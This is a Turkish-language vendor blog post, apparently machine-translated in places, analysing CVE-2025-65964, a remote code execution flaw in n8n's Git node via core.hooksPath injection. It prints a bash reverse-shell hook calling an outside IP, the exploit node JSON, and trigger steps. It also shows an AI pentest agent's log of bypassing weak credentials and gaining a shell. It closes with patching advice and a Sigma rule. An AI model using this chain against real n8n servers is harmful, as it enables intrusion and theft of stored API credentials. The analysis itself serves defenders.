Penligent Başlık

CVE-2025-65964: Yapay Zeka Altyapısında Kritik RCE için n8n'deki Git Kancalarının Silahlandırılması

Yapay zeka güvenliğinin hızla gelişen ortamında, sektör genellikle Büyük Dil Modellerine yönelik düşmanca saldırılara (komut istemi enjeksiyonu gibi) odaklanırken, bu ajanları bir arada tutan çökmekte olan "iskeleti", yani Orkestrasyon Katmanını ihmal etmektedir.

8 Aralık 2025 tarihinde, güvenlik camiası şunları açıkladı CVE-2025-65964'deki kritik bir Uzaktan Kod Yürütme (RCE) güvenlik açığı n8ndünyanın en popüler açık kaynaklı iş akışı otomasyon aracıdır. CVSS v4 puanı ile 9,4 (Kritik)Bu açık sadece başka bir web hatası değildir. Modern yapay zeka yığınlarının merkezi sinir sistemini tehlikeye atmak için meşru sürüm kontrol işlemlerini silah olarak kullanan Git'in temel yapılandırma mantığının sofistike bir kötüye kullanımını temsil ediyor.

Bu makale genel tavsiyenin ötesine geçmektedir. Sıkı bir Kırmızı Ekip bakış açısıyla, tüm İstismar Zinciritemel nedenini ve bunun neden "Ajan Tedarik Zinciri Saldırısı" olduğunu açıklıyor.

Bağlam: Git Vektör Haline Geldiğinde

n8n, LLM'leri (GPT-5 gibi), Vektör Veritabanlarını (Pinecone gibi) ve dahili API'leri birbirine yapıştırmak için yaygın olarak kullanılan modern AI uygulamalarının temel taşı haline gelmiştir. İş akışları için CI/CD ve sürüm kontrolünü desteklemek amacıyla n8n, güçlü, yerleşik bir Git Düğümü.

Çekirdek CVE-2025-65964 n8n Git Node'unun yapılandırma anahtarlarını sanitize etmedeki başarısızlığında yatmaktadır. addConfig operasyon. Saldırganlar bu gözetimden yararlanarak core.hooksPath yapılandırması, Git ikili dosyasının yürütme akışını etkili bir şekilde ele geçirir.

CVE-2025-65964: Yapay Zeka Altyapısında Kritik RCE için n8n'deki Git Kancalarının Silahlandırılması

Anlamak core.hooksPath

Standart bir Git mimarisinde, kancalar (aşağıdaki gibi olaylar üzerine çalıştırılan komut dosyaları taahhüt, Ödeme, birleştirme) deponun .git/hooks dizinine kopyalar. Güvenlik nedeniyle Git, bir depoyu klonlarken bu kancaları çoğaltmaz.

Ancak Git 2.9, kullanıcıların dosya sisteminin herhangi bir yerinde kancalar için özel bir yol tanımlamasına olanak tanıyan core.hooksPath yapılandırma seçeneğini tanıttı.

Bir saldırgan bu yapılandırma anahtarını kontrol edebilir ve yazma erişimine sahip olduğu bir dizine (örneğin, /tmp/ veya bir dosya yükleme dizini) yönlendirebilirse, n8n bir sonraki Git işlemini gerçekleştirdiğinde Git sanal alanından çıkar ve saldırganın komut dosyasını çalıştırır.

İstismar Zinciri: Bir Mantık Hatası Masterclass'ı

Başarılı bir istismar tek bir yükten daha fazlasını gerektirir; "Mantıksal Düzenleme" gerektirir. Aşağıda, araştırma laboratuvarımızdan saldırının adım adım yeniden üretimi yer almaktadır.

Aşama 1: Keşif ve Erişim

Saldırgan önce n8n iş akışı düzenleyicisine erişim kazanır. Birçok kurumsal intranette n8n, genellikle sıkı kimlik doğrulaması olmayan veya zayıf varsayılan kimlik bilgilerinin arkasında oturan yapay zeka mühendisleri ve veri bilimcileri tarafından kullanılmaktadır.

Hedef Onayı: 0.123.1 <= n8n Sürüm < 1.119.2.

2. Aşama: Görev Yükünün Hazırlanması

O zamandan beri core.hooksPath bir dizini işaret ediyorsa, saldırgan önce belirli bir Git kancası adıyla çalıştırılabilir bir komut dosyası yerleştirmelidir (örn, ödeme sonrası) yazılabilir bir konuma yerleştirin.

n8n'leri kullanarak "İkili Dosya Yaz" düğümüne (veya sertleştirilmemişse bir "Komut Çalıştır" düğümüne) kötü amaçlı bir komut dosyası bırakır.

Kötü Amaçlı Komut Dosyası Örneği (/tmp/pwn/post-checkout):

Bash

`#!/bin/bash

Bir ters kabuk yükü

Bir Git çıkış işleminden sonra sessizce yürütülür

/bin/bash -i >& /dev/tcp/10.10.10.5/4444 0>&1`

Aşama 3: Konfigürasyon Enjeksiyonu

Bu tetikleme noktasıdır. Saldırgan bir Git Düğümü ve "Yapılandırma Ekle" işlemini seçer. Normalde kullanıcılar şunları yapılandırır kullanıcı.adı veya kullanıcı.e-posta. Ancak saldırgan JSON parametrelerini doğrudan manipüle ederek tehlikeli anahtarı enjekte eder.

Exploit JSON Yükü:

JSON

{ "parametreler": { "operation": "addConfig", "configName": "core.hooksPath", "configValue": "/tmp/pwn", "repositoryPath": "/home/node/.n8n/git/workflow_repo" }, "name": "Weaponized_Git_Config", "type": "n8n-nodes-base.git", "typeVersion": 1, "pozisyon": [460, 300] }

Bu düğüm yürütüldüğünde, temel n8n süreci çalışır:

git config -file /home/node/.n8n/git/workflow_repo/.git/config core.hooksPath /tmp/pwn

4. Aşama: Tetikleyici

Yapılandırma bir kez ayarlandığında kalıcı olur. Saldırgan, git checkout master veya git status gibi iyi huylu bir işlem gerçekleştirmek için iş akışına başka bir Git Node ekler.

Sıra: Git Süreci Başlıyor -> core.hooksPath dosyasını okur -> /tmp/pwn/post-checkout dosyasını yükler -> RCE Yürütüldü.

CVE-2025-65964: Yapay Zeka Altyapısında Kritik RCE için n8n'deki Git Kancalarının Silahlandırılması

Bu Neden Bir Yapay Zeka Altyapısı Kabusu?

Güvenlik mühendisleri için etki hatanın kendisinden daha kritiktir. Yapay zeka çağında, bir n8n sunucusu sadece bir web hizmeti değildir; bir Anahtar Kasası.

  1. Kimlik Bilgileri Dökümü: n8n veritabanı OpenAI, AWS Bedrock, Snowflake ve Slack için şifrelenmiş API anahtarları içerir. Kabuk erişimiyle bir saldırgan bu kimlik bilgilerinin şifresini çözebilir (genellikle ~/.n8n/database.sqlite içinde bulunur) ve kurumsal bulut ortamının tamamen tehlikeye girmesine yol açabilir.
  2. RAG Zehirlenmesi: Saldırganlar Vektör Veritabanlarına yazan iş akışlarını ele geçirebilir. Kötü niyetli bilgi parçacıkları enjekte ederek, dahili kurumsal RAG sistemlerinin çıktılarını manipüle edebilir, derin sosyal mühendislik veya dezenformasyon kampanyalarını kolaylaştırabilirler.
  3. Konteynerden Kaçış Riskleri: Birçok n8n dağıtımı, LangChain gibi Python kütüphanelerinin sistemle etkileşime girmesine izin vermek için yükseltilmiş ayrıcalıklarla (veya -privileged) çalışır. Bu gibi durumlarda, konteyner içindeki RCE işlevsel olarak ana bilgisayardaki Root'a eşdeğerdir.

Penligent Vaka Çalışması: Acente Acenteye Karşı

At Penligent.aiBunu bir "Mantık Hatası" olarak sınıflandırıyoruz. Geleneksel DAST tarayıcıları CVE-2025-65964'ü tespit edemez çünkü:

  • Tarayıcılar "bir iş akışının nasıl oluşturulacağını" bilmiyor.
  • Tarayıcılar "Önce Dosyayı Yaz, Sonra Git'i Yapılandır" şeklindeki zamansal mantığı anlayamazlar.

Ancak Penligent'ın otomatik sızma testi aracıları, gelişmiş insan saldırganları taklit eden muhakeme yetenekleri sergiliyor.

[Penligent Agent Dahili İzleme - 2025-12-09 14:02:33]

Gözlem: Hedef port 5678 açık. n8n olarak tanımlandı. Zayıf kimlik bilgileri atlama başarılı.

Gerekçe: Git Düğümü özelliği algılandı. Bilgi tabanı Git Config enjeksiyonu riskini gösterir. Doğrudan komut yürütme engellendi. Ortam veya yapılandırma manipülasyonu yoluyla yürütme elde edebilir miyim?

Eylem Planı:

  1. Girişim Komutu Yürüt çıkışını doğrulamak için (Başarısız, düğüm devre dışı).
  2. Pivot Stratejisi: Dosya yazma ilkellerini arayın. İkili Dosya Yaz düğümü kullanılabilir.
  3. Exploit Zinciri Oluşturun: /tmp/.git-hooks dosyasına ters kabuk yaz -> Git Node aracılığıyla core.hooksPath dosyasını enjekte et -> Git Log.Execution dosyasını tetikle: İş akışı kimliği pwn_test_01.Result çalıştırılıyor: Ters kabuk geri çağrısı alındı. Güvenlik açığı doğrulandı.

Bu, aşağıdakilerin temel değer önermesidir Penligent: Yapay zeka ile savaşmak için yapay zekayı kullanmak. Ajanlarımız sadece parmak izlerini eşleştirmekle kalmaz; iş mantığını anlar ve güvenli bir sanal alan içinde yüksek seviyeli düşman ticaretini simüle eder.

n8n
CVE-2025-65964 PoC

Savunma ve Tespit

İyileştirme

  • Derhal yama yapın: n8n sürümüne yükseltme 1.119.2 veya daha sonra. Yeni sürüm, aşağıdakiler için katı bir izin listesi uygular addConfig Anahtarlar.
  • Sertleşiyor: Kullanın N8N_NODES_EXCLUDE=["n8n-nodes-base.git"] Görev açısından kritik değilse Git düğümünü tamamen devre dışı bırakmak için Docker kurulumunuzdaki ortam değişkeni.

Tehdit Avcılığı

Bir ihlalden şüpheleniyorsanız .git/config n8n sunucularınızdaki dosyalar.

Sigma Algılama Kuralı Örneği:

YAML

başlık: n8n aracılığıyla Şüpheli Git Yapılandırma Değişikliği durum: deneysel günlük kaynağı: kategori: process_creation ürün: linux algılama: seçim: ParentImage|endswith: '/node' Image|endswith: '/git' CommandLine|içerir: - 'config' - 'core.hooksPath' koşul: seçim seviyesi: yüksek

Değiştirmeye çalışan bir Node.js işlemi tarafından ortaya çıkarılan herhangi bir Git komutu core.hooksPath yüksek doğrulukta bir uzlaşma göstergesi (IoC) olarak ele alınmalıdır.

Sonuç

CVE-2025-65964 yazılım geliştirme "Agent Native" mimarilere doğru kaydıkça geleneksel sınırların bulanıklaştığını bir kez daha kanıtlıyor. Araçlarımızın esnekliği çoğu zaman güvenliğin en büyük düşmanıdır.

Sıkı güvenlik mühendisleri için savaş alanı Web Frontend'den Orchestration Backend'e kaymıştır. Sadece HTTP isteklerini izlemekle kalmayın; arka planda sessizce çalışan iş akışlarını da izleyin. Otomatik Git işlemlerini izleyin. Bu 2025'in ön cephesi.

Ekibiniz bu tür karmaşık mantık risklerini manuel olarak doğrulayacak insan gücünden yoksunsa, aşağıdakileri getirmenin zamanı gelmiş olabilir Penligent-Yapay zeka çağında çizgiyi koruyan akıllı dijital kırmızı ekip.

İç Bağlantılar / Referanslar:

Gönderiyi paylaş:
İlgili Yazılar
tr_TRTurkish